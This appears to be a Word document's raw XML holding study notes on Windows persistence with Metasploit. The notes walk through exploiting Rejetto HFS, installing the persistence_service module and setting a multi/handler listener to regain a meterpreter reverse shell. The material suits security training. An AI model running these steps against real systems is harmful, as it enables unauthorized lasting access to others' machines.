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4A4A" w14:textId="43698588" w:rsidR="00853ABF" w:rsidRPr="00575C88" w:rsidRDefault="00575C88">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00575C88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Establishing Persistence </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00575C88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00575C88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738ED24" w14:textId="77777777" w:rsidR="00575C88" w:rsidRDefault="00575C88"/>
    <w:p w14:paraId="608D3D1F" w14:textId="34F42D16" w:rsidR="00575C88" w:rsidRDefault="00575C88">
      <w:r w:rsidRPr="00575C88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="00575C88">
        <w:t xml:space="preserve"> = techniques an attacker uses to survive reboots, logouts, or credential changes so their access returns or remains on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5137969E" w14:textId="77777777" w:rsidR="00575C88" w:rsidRDefault="00575C88"/>
    <w:p w14:paraId="13DA4506" w14:textId="6E65D3ED" w:rsidR="00017E0C" w:rsidRDefault="00017E0C">
      <w:r>
        <w:t>There are various post exploitation persistence modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC8B813" w14:textId="2D5F902B" w:rsidR="00017E0C" w:rsidRDefault="00017E0C">
      <w:r>
        <w:t xml:space="preserve">Right </w:t>
      </w:r>
      <w:r w:rsidR="00F90534">
        <w:t>now,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we are using one</w:t>
      </w:r>
      <w:r w:rsidR="00F90534">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5372FD3B" w14:textId="77777777" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD8DA8C" w14:textId="4384A9CD" w:rsidR="00575C88" w:rsidRPr="005E4E0D" w:rsidRDefault="005E4E0D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4E0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD8B35" w14:textId="5819780C" w:rsidR="005E4E0D" w:rsidRDefault="005E4E0D"/>
    <w:p w14:paraId="694AAA2E" w14:textId="16B83ECB" w:rsidR="00F90534" w:rsidRDefault="00F90534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2D5FEB2" w14:textId="4BA6B97A" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178BB5D6" w14:textId="4BFD3AD1" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:r>
        <w:t xml:space="preserve">Workspace </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>-a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E309A5F" w14:textId="7DD9CEA0" w:rsidR="00F90534" w:rsidRDefault="00F90534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41C5EED2" w14:textId="4F0E6D8E" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0D12E" w14:textId="1C476987" w:rsidR="00F90534" w:rsidRDefault="00F90534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1CB12A9D" w14:textId="0C657A33" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2616F951" w14:textId="4212AA67" w:rsidR="00F90534" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t>Use (</w:t>
      </w:r>
      <w:r w:rsidR="00F90534">
        <w:t>index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081AA34" w14:textId="00E87830" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:r>
        <w:t>Set payload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1D2E29E" w14:textId="1BF8AAB5" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0841EBAC" w14:textId="7E6348A8" w:rsidR="00F90534" w:rsidRDefault="00F90534">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F840F3" w14:textId="12DEB448" w:rsidR="005E4E0D" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t xml:space="preserve"># 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603A0A4" w14:textId="77777777" w:rsidR="00E3001A" w:rsidRDefault="00E3001A"/>
    <w:p w14:paraId="42E94267" w14:textId="7C90B8FD" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="219A010F" w14:textId="3CEF3485" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64420E6F" w14:textId="77777777" w:rsidR="00E04AA8" w:rsidRDefault="00E04AA8"/>
    <w:p w14:paraId="11A2C369" w14:textId="3F931B1B" w:rsidR="00E3001A" w:rsidRPr="00E3001A" w:rsidRDefault="00E3001A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3001A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E3001A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inorder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E3001A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to require persistence you must require higher privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE15F8D" w14:textId="42FFB134" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA466F" w14:textId="77777777" w:rsidR="00E3001A" w:rsidRDefault="00E3001A"/>
    <w:p w14:paraId="73E4E848" w14:textId="2DA6B858" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>platform:windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E1888" w14:textId="4AEF8C52" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t>Use(local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>persistence_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915413B" w14:textId="77777777" w:rsidR="00E3001A" w:rsidRDefault="00E3001A" w:rsidP="00E3001A">
      <w:r>
        <w:t>Set payload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26F6326" w14:textId="7CBB555C" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F2C71" w14:textId="1A1FA2AC" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A5AB1" w14:textId="23E5C782" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280AFA0" w14:textId="351BA631" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t># error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665AEFE1" w14:textId="77777777" w:rsidR="00E3001A" w:rsidRDefault="00E3001A"/>
    <w:p w14:paraId="0B148824" w14:textId="00E69C83" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r>
        <w:t>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2637EB7F" w14:textId="77777777" w:rsidR="00E3001A" w:rsidRDefault="00E3001A" w:rsidP="00E3001A">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E178105" w14:textId="123A88BA" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t xml:space="preserve"># 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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DA6C1" w14:textId="18A0F7C2" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BEFDF44" w14:textId="53F5B630" w:rsidR="00F56F72" w:rsidRDefault="00F56F72">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08EC533A" w14:textId="21855EF8" w:rsidR="00F56F72" w:rsidRDefault="00F56F72">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15154CED" w14:textId="77777777" w:rsidR="00F56F72" w:rsidRDefault="00F56F72"/>
    <w:p w14:paraId="4FFF291F" w14:textId="6CC67806" w:rsidR="00F56F72" w:rsidRDefault="00F56F72">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kill</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all the sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB3DEC" w14:textId="291DC8F8" w:rsidR="00F56F72" w:rsidRDefault="00F56F72">
      <w:r>
        <w:t>Sessions -k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C4106C" w14:textId="77777777" w:rsidR="00F56F72" w:rsidRDefault="00F56F72"/>
    <w:p w14:paraId="00F6E8F2" w14:textId="06DA9BE7" w:rsidR="00E3001A" w:rsidRDefault="00E3001A">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>once</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we setup handler after closing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="001D3DD1">
        <w:t>gives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05398CEF" w14:textId="77777777" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1"/>
    <w:p w14:paraId="6C50F544" w14:textId="5E9DA785" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9016BF" w14:textId="78C4C0D6" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1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7DFDD1EB" w14:textId="3571B1CC" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E297236" w14:textId="02A0609D" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set LHOST eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0FEC81" w14:textId="1D4AF9C4" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t>Set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D2D09" w14:textId="20964908" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>same</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as the payload that we use for persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9CD23" w14:textId="77777777" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1"/>
    <w:p w14:paraId="4E644287" w14:textId="03FC17BB" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4874F" w14:textId="19DEF653" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t xml:space="preserve"># Here we get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2022F" w14:textId="5A63C87E" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00634AD5">
        <w:t>Once</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we install the persistence service it </w:t>
      </w:r>
      <w:r w:rsidR="00634AD5">
        <w:t>continues</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run as we have the </w:t>
      </w:r>
      <w:r w:rsidR="00634AD5">
        <w:t>listener,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so we receive </w:t>
      </w:r>
      <w:r w:rsidR="00634AD5">
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00634AD5">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656D8A9D" w14:textId="76C3354F" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1">
      <w:r>
        <w:t xml:space="preserve"># LHOST LPORT </w:t>
      </w:r>
      <w:r w:rsidR="00634AD5">
        <w:t>PAYLOAD must</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be same as we used while maintaining the persistence service in the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136ED61" w14:textId="77777777" w:rsidR="001D3DD1" w:rsidRDefault="001D3DD1"/>
    <w:p w14:paraId="328A0DA5" w14:textId="7B80289C" w:rsidR="00634AD5" w:rsidRPr="00E04AA8" w:rsidRDefault="00E04AA8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D81C9" w14:textId="09B8A714" w:rsidR="00E04AA8" w:rsidRPr="00E04AA8" w:rsidRDefault="00E04AA8" w:rsidP="00E04AA8">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E04AA8">
        <w:t>in order</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04AA8">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E04AA8">
        <w:t xml:space="preserve"> require </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04AA8">
        <w:t>persistence,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04AA8">
        <w:t xml:space="preserve"> you must require higher privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFEC6A" w14:textId="77777777" w:rsidR="00E04AA8" w:rsidRDefault="00E04AA8"/>
    <w:sectPr w:rsidR="00E04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8B"/>
    <w:rsid w:val="00017E0C"/>
    <w:rsid w:val="001D3DD1"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00575C88"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005E4E0D"/>
    <w:rsid w:val="00634AD5"/>
    <w:rsid w:val="006361B9"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00DF1E8B"/>
    <w:rsid w:val="00E04AA8"/>
    <w:rsid w:val="00E3001A"/>
    <w:rsid w:val="00EE1365"/>
    <w:rsid w:val="00F56F72"/>
    <w:rsid w:val="00F9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86DF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3F71529F-2686-4FFA-9D40-ABC6F055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2025-10-11T13:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-11T13:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>